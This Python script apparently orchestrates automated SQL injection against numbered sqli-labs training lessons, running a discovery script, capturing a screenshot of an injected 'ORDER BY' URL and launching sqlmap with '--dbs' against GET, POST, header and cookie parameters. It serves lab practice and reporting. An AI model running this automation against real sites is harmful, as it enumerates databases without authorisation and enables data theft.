import subprocess
import json
import os
import time
import argparse
import sys
from pathlib import Path

# Cross-platform configuration (single source of truth)
sys.path.insert(0, str(Path(__file__).parent))
from config import (
    SQLMAP_BIN as SQLMAP_PATH,
    PYTHON_BIN,
    BASE_URL,
    PROXY_URL as PROXY,
    VULNERABILITY_PROFILE,
    ORACLE_SCRIPT as _ORACLE_PATH,
    LAB_REPORTS_DIR,
    get_lesson_dirs,
)

ORACLE_SCRIPT = str(_ORACLE_PATH)
MASTER_PROFILE = str(VULNERABILITY_PROFILE)


def run_cmd(cmd, description, capture=True):
    print(f"[*] {description}...")
    try:
        if capture:
            result = subprocess.run(cmd, capture_output=True, text=True)
            if result.returncode != 0:
                print(f"[!] Warning: {description} returned non-zero code {result.returncode}")
            return result.stdout
        else:
            subprocess.run(cmd)
            return ""
    except Exception as e:
        print(f"[!] Critical Error: {e}")
        return ""


def automate_lesson(lesson_num, master_data, dry_run=False):
    print(f"\n{'='*40}\nAUTOMATING LESSON {lesson_num}\n{'='*40}")

    # 1. Create evidence directories via config helper
    dirs = get_lesson_dirs(lesson_num)
    for d in dirs.values():
        d.mkdir(parents=True, exist_ok=True)

    # 2. Oracle Scan (Discovery)
    run_cmd([PYTHON_BIN, ORACLE_SCRIPT, "--lesson", str(lesson_num), "--json", "--no-reset"],
            "Running Oracle Discovery", capture=False)

    # 3. Parse result from merged profile
    if not os.path.exists(MASTER_PROFILE):
        print(f"[-] Lesson {lesson_num} discovery failed (No profile).")
        return False

    with open(MASTER_PROFILE, "r") as f:
        profile = json.load(f)

    lesson_data = profile.get(str(lesson_num))
    if not lesson_data:
        print(f"[-] Lesson {lesson_num} discovery failed.")
        return False

    master_data[str(lesson_num)] = lesson_data

    # 3b. File discovery report
    report_path = dirs["discovery"] / "oracle_report.txt"
    with open(report_path, "w") as rf:
        rf.write(f"Oracle Discovery Report — Lesson {lesson_num}\n")
        rf.write("=" * 50 + "\n")
        for k, v in lesson_data.items():
            rf.write(f"  {k:<12}: {v}\n")
        rf.write("\nGenerated by auto_orchestrator.py (Universal SQLi Agent Toolkit)\n")
    print(f"[*] Discovery report filed to {report_path}")

    # 4. Visual Capture
    viz_path = str(dirs["visuals"] / "auto_breakout.png")
    closure = lesson_data.get('closure', "")
    if dry_run:
        print("[DRY-RUN] Skipping visual capture.")
    elif lesson_data['method'] == "GET":
        test_url = f"{BASE_URL}Less-{lesson_num}/?id=1{closure} ORDER BY 1--+"
        print("[*] Capturing Visual Proof...")
        subprocess.run(["npx", "playwright", "screenshot", test_url, viz_path], capture_output=True)
    else:
        print("[*] Skipping visual capture for non-GET lesson.")

    # 5. Systematic Flush (sqlmap)
    log_path = str(dirs["automation"] / "sqlmap_auto.log")
    print("[*] Performing Systematic Data Flush...")

    sqlmap_cmd = [SQLMAP_PATH, "-u", f"{BASE_URL}Less-{lesson_num}/?id=1",
                  "--batch", "--dbs", "--proxy", PROXY]
    if lesson_data['method'] == "POST":
        param = lesson_data['parameter']
        sqlmap_cmd = [SQLMAP_PATH, "-u", f"{BASE_URL}Less-{lesson_num}/",
                      "--data", f"{param}=1&submit=Submit",
                      "--batch", "--dbs", "--proxy", PROXY]
    elif lesson_data['method'] == "HEADER":
        param = lesson_data['parameter']
        sqlmap_cmd = [SQLMAP_PATH, "-u", f"{BASE_URL}Less-{lesson_num}/",
                      f"--header={param}: 1*", "--batch", "--dbs", "--proxy", PROXY]
    elif lesson_data['method'] == "COOKIE":
        param = lesson_data['parameter']
        sqlmap_cmd = [SQLMAP_PATH, "-u", f"{BASE_URL}Less-{lesson_num}/",
                      "--cookie", f"{param}=1", "--batch", "--dbs", "--proxy", PROXY]

    if dry_run:
        print("[DRY-RUN] Skipping sqlmap flush.")
    else:
        with open(log_path, "w") as f:
            subprocess.run(sqlmap_cmd, stdout=f, stderr=subprocess.STDOUT)

    print(f"[+] Lesson {lesson_num} fully documented.")
    return True


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Universal SQLi Agent — Orchestrator")
    parser.add_argument("--lesson", type=int, help="Automate a single lesson")
    parser.add_argument("--range", type=str, help="Automate a range, e.g. 1-10")
    parser.add_argument("--batch-size", type=int, default=0,
                        help="Pause for 5s after every N lessons (0 = no throttle)")
    parser.add_argument("--dry-run", action="store_true",
                        help="Discovery + report only; skip visual capture and sqlmap")
    args = parser.parse_args()

    # Load existing profile for merge-write (never wipe prior lessons)
    if os.path.exists(MASTER_PROFILE):
        with open(MASTER_PROFILE, "r") as f:
            master_results = json.load(f)
    else:
        master_results = {}

    # Global Reset
    print("[*] Initializing Lab Environment (Full Reset)...")
    subprocess.run([PYTHON_BIN, ORACLE_SCRIPT, "--lesson", "1"])

    results_to_process = []
    if args.lesson:
        results_to_process.append(args.lesson)
    elif args.range:
        start, end = map(int, args.range.split('-'))
        results_to_process = list(range(start, end + 1))

    batch_size = args.batch_size if args.batch_size > 0 else len(results_to_process)
    for index, i in enumerate(results_to_process):
        if index > 0 and index % batch_size == 0:
            print(f"[*] Batch limit reached. Cooling down for 5 seconds...")
            time.sleep(5)
        automate_lesson(i, master_results, dry_run=args.dry_run)

    # Save final cumulative profile
    with open(MASTER_PROFILE, "w") as f:
        json.dump(master_results, f, indent=4)

    # Final Succession Report
    print(f"\n{'='*60}\nFINAL PROJECT SUCCESSION REPORT\n{'='*60}")
    success_count = 0
    for l in results_to_process:
        status = "PASSED" if str(l) in master_results else "FAILED"
        if status == "PASSED":
            success_count += 1
        print(f"Lesson {l:02d}: {status}")

    if results_to_process:
        print(f"\nSuccess Rate: {(success_count/len(results_to_process))*100:.1f}%")
    print(f"{'='*60}\n")
